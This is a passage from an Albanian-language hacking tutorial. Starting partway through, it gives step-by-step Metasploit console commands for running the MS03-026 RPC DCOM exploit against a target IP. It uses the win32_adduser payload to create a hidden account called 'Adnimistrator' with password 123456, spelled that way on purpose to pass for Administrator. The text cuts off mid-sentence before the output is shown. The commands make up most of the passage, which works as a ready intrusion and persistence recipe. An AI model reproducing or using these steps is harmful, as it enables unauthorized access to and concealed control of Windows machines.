3.I kshyr qfar exploit ki ne dispozicion me komanden show exploits, edhe e zgjedh ate qi po e don. Ne rastin tone une po e perdori msrpc_dcom_ms03_026
3.a) E ve ne perdorim qat exploit me komanden use msrpc_dcom_ms03_026
4. Tash duhet me zgjedh municionin e ketij exploit.
Kshyrum qfar municioni kena me komanden show payloads
Ne rastin tone une po e perdori win32_adduser .
Per secilin exploit edhe payload e keni nje pershkrim te vogel ne te djathte, ne rastin tone win32_adduser ekzekuton komanden net user /ADD ne kompjuterin cilin e sulmojm.
Zgjedhja e municionit (payload) behet me komanden set PAYLOAD win32_adduser
5. Tash e perdorim komanden show options , per me kshyr se cilet opcione duhet me ja vnu na para se me perdor exploit.
Te kolona Name e keni emrin e Opcionit cilit duhet te vendoset,
Kolona Default tregon nese ai opcion ka vlere te paracaktuar, nese eshte zbrazet ather duhet me ja vendos nje
Kurse Kolona Exploit: Tregon nese ai opcion eshte i nevojshem apo jo.
Kolona Description permban nje pershkrim te vogel per ate opcion
6. Tash po ja ndreqim opcionet:
Po e shohim opcioni RHOST nuk ka vlere te paracaktuar, dhe eshte e nevojshme, pra duhet me ja vendos na vete vlerat:
Prej kolones Description po e shofim qe RHOST qenka adresa cilen po dojm me sulmu, ne rastin tone 10.10.15.1
po ja dhame vleren:
set RHOST 10.10.15.1
Njojt veprojm e dhe me opcionet tjera:
set PASS 123456 - Passwordi per shfrytezuesin e ri
set USER Adnimistrator - emri i shfrytezuesit (me qellim osht Adnimistrator qe me kan sa ma shtir mu dallu prej Administrator ;) )
Vini re: Opcionet dallojn prej Epxploitit ne exploit dhe prej payloadit ne payload.
7. Tash krejt qka ka met mu ba osht me ekzekutu exploit me komanden:
exploit
Nese e merrni kete mesazh:
